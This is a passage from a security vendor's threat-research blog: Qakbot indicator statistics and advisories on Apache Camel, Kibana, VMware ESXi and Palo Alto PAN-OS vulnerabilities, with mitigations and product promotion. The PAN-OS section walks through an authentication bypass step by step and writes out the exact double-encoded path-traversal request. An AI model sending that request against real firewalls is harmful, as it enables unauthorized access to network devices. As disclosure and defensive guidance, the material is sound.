175.111.128[.]234 was added to the Threatfox report on July 10th, 2024. Figure 3. Indicators of Compromise sample, sourced from Threatfox The same IP address (175.111.128[.]234) was present in aggregated deployable threat intelligence as of January 1, 2024. This is seen below in Figure 4. Figure 4. First Seen Date of Sampled Indicator of Compromise in Centripetal’s Threat Intelligence While the first Threatfox sample dates back to February 9th, 2024, Centripetal had already begun tracking these 1,000 IPs as early as January 1, 2024. This highlights the value of proactive threat intelligence—allowing CleanINTERNET to detect and mitigate threats before they are attributed or publicly reported. By leveraging early intelligence, our technology preemptively blocks malicious activity, minimizing the risk of compromise and strengthening cybersecurity defenses (Figure 5). Figure 5. Cumulative coverage of 1,000 Threatfox IPs in Centripetal’s intelligence, starting January 1, 2024. Over the course of a year, we analyzed 1,000 Qakbot-related IOCs. As of March 11th, 2025, the findings reveal that 98.9% of these indicators were covered by our threat intelligence—meaning they were identified, tracked, or shielded as part of our security solution—while only 1.1% were not covered. This indicates highly comprehensive coverage, ensuring that the vast majority of identified Qakbot-related threats were successfully mitigated. The small percentage of IOCs not covered underscores the importance of continuous intelligence refinement to address emerging or previously unseen indicators. Figure 6. Overall CTI IP coverage dating back to January 1, 2024 (1,000 IOCs in sample) The next phase of our analysis examines the top 20 IP triggers observed across all customers targeted by this campaign. Figure 7 shows that IP 37.44.238[.]66 accounts for 72.8% of these triggers. Our research indicates that multiple threat intelligence sources have flagged this IP as malicious. AbuseIPDB, a well-known database for reporting inbound traffic abuse, has documented continuous reconnaissance activity associated with this IP since 2023. This IP has been observed performing extensive port scanning on both well-known and ephemeral ports across the internet. Figure 7. Top 20 Trigger IPs o validate the information obtained from intelligence sources, we conducted an additional analysis to determine how much of this attribution was associated with inbound versus outbound activity from this IP across all of our customers over the year-long analysis period. As shown in Figure 8, over 79% of the traffic was attributed to inbound activity, while the remaining 20% was related to outbound traffic. Figure 8. Directionality of events from 37.44.238[.]66 Another critical insight from this analysis was determining whether the inbound activity resulted in any full connections during its probing attempts. By examining the Transmission Control Protocol (TCP) flags, Figure 9 shows that 97% of these connections only reached the initial stage of a full TCP handshake. In most observed port scanning scenarios, the presence of only the Synchronization (SYN) flag confirms that no response was received from the intended target. This finding suggests that this malicious IP plays a distinct role in the QakBot campaign. Rather than serving malicious payloads or acting as a command and control (C2) server, its primary function appears to be initiating the reconnaissance phase, as defined in the MITRE ATT&CK framework. Figure 9. Inbound TCP Flags from IP 37.44.238[.]66 Lastly, attribution analysis by industry reveals that 55.4% of Indicators of Compromise (IOCs) were observed in the education sector (Figure 10). According to cisecirity.org, Qakbot ranks among the top five cybersecurity threats affecting K-12 institutions, accounting for 43% of malware infections in schools. Figure 10. IP Action Percentage for Business Sector The disproportionately high percentage of attacks targeting the education sector compared to other industries is a significant concern. CriticalStart.com published an article highlighting the growing interest of threat actors in this sector. Their analysis states: “The education sector continues to be one of the most targeted industries as cyber threat actors adapt to new security measures and employ more sophisticated targeting practices. In the first six months of 2023, the education industry experienced a 179% increase in attack volume compared to the same period in 2022. Many of these cyberattacks have shifted toward K-12 organizations, whereas previously, threat actors primarily targeted higher education institutions. Often, educational institutions lack robust IT infrastructure and security measures to protect vast amounts of proprietary information related to students, faculty, and staff. As a result, threat actors perceive the education sector as a low-risk, high-reward target, making it an increasingly attractive industry for cyberattacks.”- CriticalStart QakBot's continuous evolution demonstrates its adaptability and persistence as a cyber threat, expanding from financial theft to facilitating ransomware, espionage, and large-scale malware distribution. Despite law enforcement disruptions, its infrastructure and attack methods remain resilient, reinforcing the need for proactive threat intelligence. By staying ahead of emerging tactics, organizations can enhance their defenses and mitigate the risks posed by QakBot and similar evolving threats. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources CISA - Identification and Disruption of QakBot Infrastructure Threatfox - Historical Indicators of Compromise to date Trellix - URLs Linked to QakBot Zscaler - Tracking 15 Years of Qakbot Development Votiro - The Return of Qakbot: Navigating New Threats in 2024 Palo Alto Networks - Wireshark Tutorial: Examining Qakbot Infections Microsoft - A closer look at QakBot’s latest building blocks (and how to knock them down) 24by7Security - International Collaboration Takes Down QakBot Malware Botnet Cisecurity - Cybersecurity for Educational Institutions CriticalStart - Cybercriminals Attack Vectors within the Education Sector MITRE - ATT&CK framework AbuseIPDB - Sample IP used for inbound analysis The Register - Qakbot's backbot: FBI-led takedown keeps crims at bay for just 3 months Fidelis Security - New Variants of Qakbot Banking Trojan --- ### [Apache Camel Message Header Injection via Improper Filtering](https://www.centripetal.ai/threat-research/apache-camel-vulnerability) Published: 2025-03-11 Summary: Get the facts on CVE-2025-27636: Despite alarmist claims of an 'end of the world' zero-day, Apache Camel’s Message Header Injection vulnerability is limited to specific conditions within the… In the days leading up to the publication of the Apache Camel Message Header Injection via Improper Filtering, now known as CVE-2025-27636, alarmist noise emerged from the wider cyber community, with Kevin Beaumont describing it as an “end of the world zero day" in Apache Camel, along with explicit details on how elements of this vulnerability worked. Apache have since disclosed that the vulnerability is only present in very specific conditions of the Apache Camel-Bean component where improper input validation in these specific circumstances could enable a threat actor to craft Camel header names and to alter the behaviors of the Camel Bean component. Vulnerability Type (CWE) CWE-1321: Improper Handling of Case Sensitivity (Input Filtering) The product does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results. CVSS Score (at the time of writing) Base Score: In flux - however, a moderate 5.1 temporary score has been assigned by VulnDB Attack Vector: Network (AV:N) - Exploitable remotely via HTTP requests containing crafted headers. An attacker can target any exposed Camel endpoint (e.g. a web service) without physical access. Attack Complexity: High (AC:H) - Successful exploitation requires a specific application configuration and knowledge of internal method names. The target service must be using Camel’s HTTP-based components and routing to a backend bean with multiple methods . This non-default scenario. Privileges Required: None (PR:N) - No prior authentication is needed. If a Camel application is exposed to the internet (e.g. a public HTTP endpoint), an attacker can send malicious requests directly without credentials User Interaction: None (UI:N) - The attack is initiated by the attacker’s crafted input alone; no user involvement is required once a vulnerable service is accessible. Scope: Medium (S:U) - The injected headers affect the Camel application’s own execution context. The attack does not inherently escape to other systems or elevate privileges beyond the targeted service’s scope. Impact on Confidentiality/Integrity/Availability: (C:L/I:L/A:L) The confidentiality impact is Low. The integrity impact is low. The availability impact is low. Impacted Versions BranchAffected VersionsRecommended Upgrade4.10.x LTS4.10.0 - 4.10.14.10.24.8.x LTS4.8.0 - 4.8.44.8.53.x3.10.0 - 3.22.33.22.4 Mitigation Steps Users are recommended to upgrade to version 4.10.2 and by removing the headers in your Camel routes via the use of the removeHeaders EIP with the pattern ".removeHeaders("", "Camel", "camel*", "org.apache[.]camel.*")" to filter out all headers except those beginning with "Camel", "camel", or "org.apache.camel.", which will effectively exclude any improperly cased variations such as "cAmel" or "cAMEL" while preserving only the correctly formatted Camel headers. (Apache’s Jira) Exploit Process The affected Apache Camel instances 4.10.0 to 4.10.1, from 4.8.0 to 4.8.4 and from 3.10.0 to 3.22.3 are vulnerable due to a bug in the default security filter, designed to prevent unauthorized header injections, to be case-sensitive. All the known Camel HTTP components such as: camel-servlet camel-jetty camel-undertow camel-platform-http camel-netty-http would be vulnerable out of the box. In terms of usage of the default header filter strategy the list of components using that is: camel-activemq camel-activemq6 camel-amqp camel-aws2-sqs camel-azure-servicebus camel-cxf-rest camel-cxf-soap camel-http camel-jetty camel-jms camel-kafka camel-knative camel-mail camel-nats camel-netty-http camel-platform-http camel-rest camel-servlet camel-sjms camel-spring-rabbitmq camel-stomp camel-tahu camel-undertow camel-xmpp Which when combined with the Camel-Bean component, would allow the threat actor to circumvent this filter by crafting requests to change the capitalization of the header names. Successful exploitation would enable the injection of arbitrary headers to trigger unintended method calls within the application’s Bean registration by using Simple Expression Language or Object-Graph Navigation Language (OGNL) into method parameters or in the case of camel-jms, redirect messages to unintended queues. This is particularly concerning for Camel applications directly exposed to internet traffic via HTTP however it is constrained to methods within the bean defined in the route’s URI. Timeline 2025-03-04 - Assigned CVE-2025-27636 (link) 2025-03-09 - NVD Published Date (link) TTPs & IOCs Monitor for anomalous or oddly capitalized HTTP requests used to bypass this filter. Monitor for headers crafted to invoked unintended methods within the targeted Camel bean which will use Simple Expression Language or OGNL to manipulate the method parameters. In camel-jms instances, the attackers will manipulate headers to redirect messages to unauthorized queues on the same broker. Monitor for the targeting of internet-facing Camel applications that use the vulnerable HTTP components. Centripetal’s Perspective As Apache Camel is extensively used in enterprise environments across multiple industries as a powerful open-source integration framework that allows developers to integrate various systems and applications. This makes it highly valuable for businesses that need to connect disparate software and a high value target. Although this CVE has been assigned as a moderate criticality, it is recommended that users of Apache Camel assess their deployment and apply remediations and mitigations as advised. Users with the CleanINTERNET® service in front of any of their assets will continue to receive the protections provided by emerging threat intelligence related to threat actors who may attempt to exploit this vulnerability. If you are a current client of Apache Camel and wish to discuss this further, please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://doublepulsar.com/no-there-isnt-a-world-ending-apache-camel-vulnerability-edd055f40d39 https://lists.apache.org/thread/l3zcg3vts88bmc7w8172wkgw610y693z https://issues.apache.org/jira/browse/CAMEL-21838 https://www.cve.org/CVERecord?id=CVE-2025-27636 https://camel.apache.org/security/CVE-2025-27636.html https://vuldb.com/?id.299054 https://nvd.nist.gov/vuln/detail/CVE-2025-27636#VulnChangeHistorySection https://debricked.com/vulnerability-database/vulnerability/CVE-2025-27636 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27636 https://camel.apache.org/security/CVE-2025-27636.txt.asc https://www.openwall.com/lists/oss-security/2025/03/09/1 https://my.f5.com/s/article/K000150304 --- ### [Arbitrary Command Execution in Kibana](https://www.centripetal.ai/threat-research/arbitrary-command-execution-in-kibana) Published: 2025-03-07 Summary: Kibana has disclosed a critical security vulnerability (CVE-2025-25015) with a CVSS score of 9.9, affecting versions 8.15.0–8.17.2. This prototype pollution flaw allows arbitrary code execution via… On Wednesday, March 5th, Kibana disclosed a security vulnerability with a Critical CVSS score of 9.9 impacting versions 8.15.0 through 8.17.2, with 8.17.3 being patched to fully remediate the vulnerability. The vulnerability, known as prototype pollution, revolves around the malicious crafting of file uploads and the sending HTTP requests leading to arbitrary code execution on the host machine. This issue is being tracked as CVE-2025-25015 and further documented under ESA-2025-06. Vulnerability Type CWE-1321: Prototype Pollution The flaw is categorized under Improperly Controlled Modification of Object Prototype Attributes, commonly known as Prototype Pollution which allow attackers to manipulate an application’s JavaScript objects and properties, potentially enabling unauthorized data access, privilege escalation, denial of service, or even remote code execution. CVSS Score Base Score: 9.9 (Critical) Attack Vector: Network (AV:N) – The attack can be carried out remotely over a network (e.g. via HTTP requests to Kibana) Attack Complexity: Low (AC:L) – No special conditions or bypasses are required; the exploit is straightforward once access is obtained Privileges Required: Low (PR:L) – The attacker needs at most a low-privileged Kibana account (such as a Viewer role) to exploit the flaw User Interaction: None (UI:N) – No user assistance or interaction is needed during the attack Scope: Changed (S:C) – A successful exploit can break out of the Kibana application scope, potentially impacting the underlying host or connected systems Impact on Confidentiality/Integrity/Availability: High (C:H/I:H/A:H) – Exploitation can lead to complete compromise of data and systems: the attacker can view sensitive data, modify or destroy data, and disrupt services Impacted Versions Kibana versions >= 8.15.0 and < 8.17.3 Mitigation Steps The current recommended remediation is to upgrade to version 8.17.3. Software upgrades may take time to implement. In the interim, organizations can protect themselves by modifying the Kibana configuration file to include the following configuration: 💡xpack.integration_assistant.enabled: false In most scenarios, this configuration change will not impact users or current server function unless the feature is being actively used for the import of previously unmapped data schemas through the "Automatic Import" UI, using the AI-driven data integration features, or are using the Amazon Bedrock Connector in conjunction with Elastic's built-in AI functionality. Exploit Process The vulnerability, known as prototype pollution, is invoked through a maliciously crafted file upload and specifically crafted HTTP requests that allow for arbitrary command execution. The exploitation path following would likely include developing persistence and a means of maintaining a connection that does not depend upon Kibana for further attacks. Affected versions and their details are highlighted below with a notable disclosure from Kibana that self-managed Kibana instances on Basic or Platinum licenses are not affected by this vulnerability: VersionsDetailsKibana 8.15.0 – 8.17.0Any user with the Viewer role can trigger the exploit.Kibana 8.17.1 – 8.17.2:Exploitation is restricted to higher-privileged roles. An attacker’s Kibana role must include ALL of the following privileges:actions:execute-advanced-connectorsfleet-allintegrations-all At the time of writing, there is no evidence of a public Proof-of-Concept available nor is there any evidence of mass exploitation. What to watch out for: Examine existing access controls to limit exposure to trusted personnel only, which will limit exposure to that of an insider threat Monitor for suspicious HTTP requests , API calls or unexpected file uploads to the environment Examine Kibana logs for anomalous activity and alerts Centripetal’s Perspective While Kibana has traditionally been considered a safe and secure platform, organizations have been deploying the software more frequently to structure data prior to ingestion into their current SIEM architecture. The increased usage has resulted in more focus from the broader security industry as a whole. CVE-2025-25015 is the fourth critical vulnerability in Kibana since August 2024 (CVE-2024-37287, CVE-2024-37288, and CVE-2024-37285). Given the severity of the vulnerability immediate patching of affected versions of the service is advised and mitigation strategies put in place to reduce the risk posed. Due to the timeliness of the notification from Kibana and their available patch and mitigation, proper remediation efforts can be employed, to ensure organizations are able to safely protect themselves. Users with a publicly accessible Kibana instance behind the CleanINTERNET® service will continue to receive the protections provided by emerging threat intelligence related to threat actors who may attempt to exploit this vulnerability. However, if you are a current client of Kibana and have additional questions on this advisory, please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://thehackernews.com/2025/03/elastic-releases-urgent-fix-for.html?m=1 https://discuss.elastic.co/t/kibana-8-17-3-security-update-esa-2025-06/375441 https://learn.snyk.io/lesson/prototype-pollution/ https://www.imperva.com/learn/application-security/prototype-pollution/ https://socradar.io/kibana-cve-2025-25012-system-code-execution/ https://www.tenable.com/cve/CVE-2025-25012 https://feedly.com/cve/CVE-2025-25015 https://www.elastic.co/guide/en/kibana/current/settings.html --- ### [Zero-Day Vulnerabilities in VMware ESXi, Workstation and Fusion](https://www.centripetal.ai/threat-research/zero-day-vulnerabilities-in-vmware-esxi-workstation-and-fusion) Published: 2025-03-06 Summary: Broadcom released security updates on March 4, 2025, to fix three actively exploited VMware ESXi, Workstation, and Fusion vulnerabilities, preventing code execution and data leaks. On March 4, 2025, Broadcom, which acquired VMware in 2023, released security updates to fix three actively exploited vulnerabilities in VMware ESXi, Workstation, and Fusion that could result in code execution and information disclosure. CVE-2025-22224 is a critical TOCTOU (Time-of-Check Time-of-Use) race condition vulnerability that leads to an out-of-bounds write, allowing an attacker with administrative privileges on a virtual machine to execute code as the VMX process on the host. CVE-2025-22225 is a high-severity arbitrary write vulnerability that enables an attacker with VMX process privileges to perform kernel writes, potentially leading to a sandbox escape and host compromise. CVE-2025-22226 is a high-severity out-of-bounds read flaw in the Host Guest File System (HGFS), which could allow attackers with administrative VM privileges to access sensitive memory from the VMX process. Broadcom noted that exploitation requires elevated privileges, indicating these vulnerabilities have likely been used in targeted attacks where threat actors first gained initial access to victim systems before moving laterally into the hypervisor. Impacted Products and Versions Affected ProductsCVEsVMware ESXiCVE-2025-22224, CVE-2025-22225, CVE-2025-222268.0  before ESXi80U3d-24585383 8.0 before ESXi80U2d-24585300 7.0 before ESXi70U3s-24585291VMware WorkstationCVE-2025-22224, CVE-2025-2222617.x before 17.6.3VMware FusionCVE-2025-2222613.x before 13.6.3VMware Cloud FoundationCVE-2025-22224, CVE-2025-22225, CVE-2025-222265.x, 4.5.xVMware Telco Cloud PlatformCVE-2025-22224, CVE-2025-22225, CVE-2025-222265.x, 4.x, 3.x, 2.xVMware Telco Cloud InfrastructureCVE-2025-22224, CVE-2025-22225, CVE-2025-222263.x, 2.x VMware ESXi and Workstation TOCTOU Race Condition Vulnerability CVE-2025-22224 is a critical-severity TOCTOU (Time-of-Check Time-of-Use) vulnerability affecting VMware ESXi, Workstation and other products. This flaw arises from a TOCTOU race condition, leading to an out-of-bounds write. An attacker with local administrative privileges on a virtual machine can exploit this vulnerability to execute code as the VM's VMX process running on the host. Vulnerability Type (CWE) CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition CVSS Score 9.3 (Critical) Exploit Process Gaining Local Administrative Privileges: an attacker must first obtain administrative privileges on the guest VM. This could be achieved through various means, such as exploiting other vulnerabilities or leveraging existing access rights. Exploiting the TOCTOU Race Condition: with administrative privileges, the attacker can exploit the TOCTOU race condition within the VMCI component. The condition involves the product checking the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the product to perform invalid actions when the resource is in an unexpected state. This weakness can be security-relevant when an attacker can manipulate the timing between the check of a condition and the use of the result, leading to an out-of-bounds write. Executing Code as the VMX Process: the out-of-bounds write allows the attacker to execute arbitrary code as the VMX process on the host, potentially leading to a full compromise of the host system. VMX is a process that runs in the VMkernel that is responsible for handling input/output to devices that are not critical to performance. Watch out for: Unusual or unexpected write operations by the VMCI component. Access logs indicating attempts to exploit race conditions within the VMCI component. VMware ESXi Arbitrary Write Vulnerability CVE-2025-22225 is high-severity arbitrary write vulnerability affecting VMware ESXi and other products. This weakness allows a malicious actor with privileges within the VMX process to perform arbitrary kernel writes, potentially leading to a sandbox escape and further compromising the host system. Vulnerability Type (CWE) CWE-123: Write-what-where Condition CVSS Score 8.2 (High) Exploit Process Gaining Privileges within the VMX Process: an attacker must first obtain privileges within the VMX process. This could be achieved through various means, such as exploiting other vulnerabilities or leveraging existing access rights. Crafting Malicious Payloads: with the acquired privileges, the attacker crafts specific payloads designed to perform arbitrary kernel writes. These payloads are meticulously constructed to target critical memory regions within the host's kernel. Executing Arbitrary Kernel Writes: the malicious payloads are executed, triggering the arbitrary write operations. By writing to specific kernel addresses, the attacker can manipulate the host's operating system behavior. Achieving Sandbox Escape: through these arbitrary writes, the attacker can modify kernel structures or inject malicious code, effectively escaping the sandbox environment. This allows the attacker to execute code with elevated privileges on the host system, leading to potential full system compromise. Watch out for: Unusual access patterns or logs indicating attempts to write to kernel memory regions. Detection of tools or scripts designed to exploit arbitrary write vulnerabilities in VMware environments. VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability CVE-2025-22226 is a high severity information disclosure vulnerability affecting VMware, EXSi, Workstation and other products. This vulnerability arises from an out-of-bounds read in the Host Guest File System (HGFS), potentially allowing attackers with administrative privileges on a virtual machine (VM) to access sensitive memory from the VMX process. Vulnerability Type (CWE) CWE-125: Out-of-bounds Read CVSS Score 7.1 (High) Exploit Process Crafting Malicious Requests: the attacker crafts specific requests that interact with the HGFS component, aiming to trigger the out-of-bounds read condition. Triggering the Vulnerability: by executing these crafted requests within the guest VM, the attacker induces the HGFS to perform read operations beyond its allocated memory boundaries. Accessing VMX Process Memory: this out-of-bounds read allows the attacker to access portions of the VMX process memory, potentially leaking sensitive information from the host system. Watch out for: Unusual access patterns or logs indicating attempts to read from the VMX process memory. Detection of tools or scripts designed to exploit out-of-bounds read vulnerabilities in VMware environments. Interaction with Other Vulnerabilities: While CVE-2025-22226 primarily concerns information disclosure, CVE-2025-22225 focuses on arbitrary kernel writes leading to sandbox escape, and CVE-2025-22224 primarily concerns code execution through a race condition, they could be leveraged in conjunction with one another to facilitate more severe attacks, such as privilege escalation or arbitrary code execution on the host system. Exploitation is the Wild Microsoft has identified exploitation of CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 in the wild and reported the findings to VMware. This confirms that attackers have actively used these vulnerabilities to compromise systems before public disclosure. The existence of these exploits in real-world attacks significantly increases the urgency of patching affected VMware environments. Additionally, in the weeks before VMware disclosed the vulnerabilities, a VM escape exploit was being advertised on an underground forum for $150,000. The impacted versions listed in the forum post overlap with the versions now confirmed as vulnerable, suggesting a possible connection. However, it remains unclear whether the exploit for sale is the same one discovered in the wild by Microsoft. VM escape exploit ad on an underground forum At present, the exploit has not been publicly leaked, meaning it is not available on platforms like GitHub, nor has anyone released a detailed reverse-engineering write-up from VMware’s patch. This provides organizations with a critical but limited window to apply patches before more threat actors gain access to a working exploit. If a full exploit chain is released publicly—whether through leaked proof-of-concept code or a technical breakdown—widespread adoption by threat actors is inevitable. This would enable attackers to escalate low-privileged access within an organization to full control over virtualized environments, potentially affecting multiple organizations running vulnerable VMware deployments. Security teams must act immediately to apply patches and monitor for signs of compromise. Mitigation Steps Identify Affected Systems: determine which systems are running the impacted versions of VMware ESXi, Workstation, Fusion, and related products. Apply Patches Promptly: download and install the appropriate patches from VMware's official channels. Review Security Configurations: ensure that only authorized personnel have administrative privileges on virtual machines, limiting potential attack vectors. Implement Network Segmentation: isolate virtualized environments and management interfaces from general network traffic to limit an attacker's ability to move laterally and exploit vulnerabilities across multiple systems. Centripetal’s Perspective Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against critical vulnerabilities like CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226, which impact VMware ESXi, Workstation, Fusion, and related products. These vulnerabilities allow attackers with local administrative privileges on a virtual machine to execute code as the VMX process, perform arbitrary kernel writes leading to sandbox escapes, or access sensitive memory from the VMX process, potentially compromising the host system. Leveraging billions of threat indicators, CleanINTERNET® dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. By reducing the attack surface, enhancing security operations, and ensuring business continuity, CleanINTERNET® enables organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. The vulnerabilities CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 pose significant security risks to VMware ESXi, Workstation, Fusion, and related products, particularly when chained together to achieve full system compromise. Exploiting these vulnerabilities requires existing privileged access, meaning an attacker must first compromise a virtual machine before escalating privileges to the hypervisor level. However, these vulnerabilities can be chained together to maximize impact, allowing an attacker to move from a compromised VM to full control over the underlying ESXi host. According to Rapid7’s analysis, this escalation path makes them particularly dangerous in targeted attacks, where threat actors with initial footholds in a virtualized environment could achieve full system takeover. VMware has released security patches and strongly urges immediate updates to mitigate these vulnerabilities. Organizations should apply patches promptly to affected VMware products, restrict administrative privileges on virtual machines to limit an attacker's ability to exploit these vulnerabilities, and monitor for indicators of compromise, including unusual VMCI activity, attempts to write to kernel memory, or unauthorized access to the VMX process memory. Implementing network segmentation is also crucial to limit an attacker’s ability to move laterally within the environment. If you are a current client of VMware ESXi, Workstation or Fusion please contact support@centripetal.ai . Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources https://www.cve.org/CVERecord?id=CVE-2025-22224 https://cwe.mitre.org/data/definitions/367.html https://www.cve.org/CVERecord?id=CVE-2025-22225 https://cwe.mitre.org/data/definitions/123.html https://www.cve.org/CVERecord?id=CVE-2025-22226 https://cwe.mitre.org/data/definitions/125.html https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390 https://www.infosecurity-magazine.com/news/vmware-patch-exploited-zero-day/ https://www.securityweek.com/broadcom-patches-3-vmware-zero-days-exploited-in-the-wild/ https://thehackernews.com/2025/03/vmware-security-flaws-exploited-in.html https://cybersecuritynews.com/threat-actor-vmware-esxi-0-day/ https://doublepulsar.com/use-one-virtual-machine-to-own-them-all-active-exploitation-of-esxicape-0091ccc5bdfc https://www.rapid7.com/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/ https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004 --- ### [Authentication Bypass Vulnerability in Palo Alto PAN-OS Management Interface](https://www.centripetal.ai/threat-research/pan-os-authentication-bypass-vulnerability-cve-2025-0108) Published: 2025-02-20 CVE-2025-0108 is a high-severity authentication bypass vulnerability affecting Palo Alto’s PAN-OS, the operating system for their next-generation firewalls. This flaw allows an unauthenticated attacker with network access to the PAN-OS management web interface to bypass authentication controls and execute restricted PHP scripts. The vulnerability arises from improper handling of authentication enforcement within the web management interface, specifically due to discrepancies in how Nginx and Apache process HTTP requests. While this flaw does not allow direct remote code execution, it can compromise the integrity and confidentiality of the system, potentially exposing sensitive configuration data or enabling further exploitation when chained with other vulnerabilities. Affected PAN-OS versions include those prior to, but not including PAN-OS 11.2.4-h4, PAN-OS 11.1.6-h1, PAN-OS 10.2.13-h3 and PAN-OS 10.1.14-h9. Prisma Access and Cloud NGFW instances are unaffected. The vulnerability was assigned a CVSS score of 8.8, underscoring the severe impact on system confidentiality, integrity, and availability. This vulnerability, chained with other vulnerabilities, could allow unauthorized access to unpatched and unsecured firewalls. (Security Week, 2025; Palo Alto, 2025). Vulnerability Type (CWE) CWE-306 Missing Authentication for Critical Function CVSS Score 8.8 (High) Impacted Versions PAN-OS 11.2 – Versions prior to 11.2.4-h4 PAN-OS 11.1 – Versions prior to 11.1.6-h1 PAN-OS 10.2 – Versions prior to 10.2.13-h3 PAN-OS 10.1 – Versions prior to 10.1.14-h9 Mitigation Steps Immediate Patching: Upgrade PAN-OS to the latest patched versions: PAN-OS 11.2.4-h4 or later PAN-OS 11.1.6-h1 or later PAN-OS 10.2.13-h3 or later PAN-OS 10.1.14-h9 or later Customers using PAN-OS 11.0 must upgrade to a supported version, as no fixes are planned (Palo Alto, 2025). Restrict Management Interface Access: Secure external-facing management interfaces (Palo Alto, 2025). Restrict management access to only trusted internal IP addresses (Palo Alto, 2025). Enable Threat Prevention Controls: If subscribed to Palo Alto Networks Threat Prevention, enable Threat ID 510000 and 510001 to block exploit attempts (Palo Alto, 2025). Monitor for Exploitation Attempts: Review firewall logs for unauthorized authentication bypass attempts. Identify access requests to PAN-OS management interfaces from untrusted networks. Use threat intelligence feeds to track malicious IP addresses attempting to exploit the vulnerability. Exploit Process Prerequisites The target firewall must be running an unpatched version of PAN-OS: PAN-OS prior to 11.2.4-h4, 11.1.6-h1, 10.2.13-h3, and 10.1.14-h9. The management web interface must be exposed to an attacker’s network. The attacker must be able to send HTTP requests to the management interface. According to Assetnote, the exploitation process is the following: Step-by-Step Exploitation Step 1: Understanding the Path Confusion The PAN-OS web management interface is handled by Nginx as a reverse proxy before forwarding requests to Apache and mod_php. Authentication is enforced using the X-pan-AuthCheck header in Nginx, which is toggled based on the request path. Apache, however, reprocesses paths differently, leading to a discrepancy that allows authentication bypass. Step 2: Crafting the Exploit Request The vulnerability can be exploited by double encoding a path traversal sequence. A specially crafted URL in the following format can be used:GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1·Host: <TARGET_IP>·Connection: close Explanation: %252e%252e → Double encoded version of .. (dot-dot sequence for directory traversal) /unauth/ → Triggers Nginx to disable authentication checks /php/ztp_gate.php → Targets a sensitive PHP script within the management interface PAN_help/x.css → Added to ensure correct internal URL rewriting by Apache Step 3: Bypassing Authentication Nginx Processing: Decodes %252e%252e once, resulting in /unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css. Matches /unauth/ rule and disables authentication (X-pan-AuthCheck: off) Forwards request to Apache Apache Processing: Second decoding of %2e%2e results in /unauth/../php/ztp_gate.php/PAN_help/x.css. Apache normalizes the path, resolving it to /php/ztp_gate.php/PAN_help/x.css. The request is now handled as an authenticated request to /php/ztp_gate.php, bypassing authentication Step 4: Exploiting the Unauthenticated Access Once the authentication bypass is achieved, an attacker can: Access PHP scripts that were intended to be restricted Extract sensitive information such as system configuration and credentials Chain the attack with other vulnerabilities (e.g., CVE-2024-9474) to achieve full system compromise Interaction with Other Vulnerabilities CVE-2025-0108 is particularly dangerous when exploited in conjunction with other vulnerabilities in PAN-OS, notably CVE-2024-9474 and CVE-2025-0111. Attackers have been observed chaining these flaws to escalate privileges and gain deeper system access. CVE-2024-9474 (Privilege Escalation, CVSS 6.9): This vulnerability allows an attacker with administrator access to execute commands on the firewall operating system with root privileges. While CVE-2025-0108 alone does not provide direct remote code execution, when combined with CVE-2024-9474, it enables unauthenticated attackers to first bypass authentication and then escalate privileges to root if they gain administrative access (The Register, 2025). CVE-2025-0111 (Local File Read, CVSS 7.1): This flaw allows authenticated attackers to read files accessible to the "nobody" user on the system. When chained with CVE-2025-0108, an unauthenticated attacker could first bypass authentication and then use CVE-2025-0111 to read sensitive system files, potentially extracting credentials or configuration details to further compromise the firewall (The Register, 2025). Timeline 2025-02-12 - Initial announcement, Palo Alto added Threat Prevention Threat ID to Workarounds and Mitigations 2025-02-18 - Palo Alto Networks has confirmed exploitation based on a publicly available PoC. 2025-02-19 - Updated fix availability for PAN-OS 10.2 and 11.1 Centripetal’s Perspective Centripetal’s CleanINTERNET® service provides a proactive, intelligence-driven defense against vulnerabilities like CVE-2025-0108, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. Leveraging billions of threat indicators, CleanINTERNET® dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats. CVE-2025-0108 is a high severity authentication bypass vulnerability in Palo Alto Networks’ PAN-OS management web interface. The flaw stems from misconfigurations in how Nginx and Apache process HTTP requests, specifically in handling authentication headers and path traversal. By leveraging double URL encoding and path confusion techniques, attackers can bypass authentication and invoke PHP scripts, potentially exposing sensitive data and impacting system integrity. Currently, GreyNoise has identified multiple IP addresses actively exploiting this vulnerability in the wild (GreyNoise, 2025). Palo Alto Networks has released security patches for supported PAN-OS versions and strongly urges immediate updates. Organizations should apply these patches as soon as possible and follow best practices, including restricting access to the management interface to trusted internal IPs. Continuous monitoring for indicators of compromise (IoCs), such as unusual login attempts or unauthorized script executions, is essential. 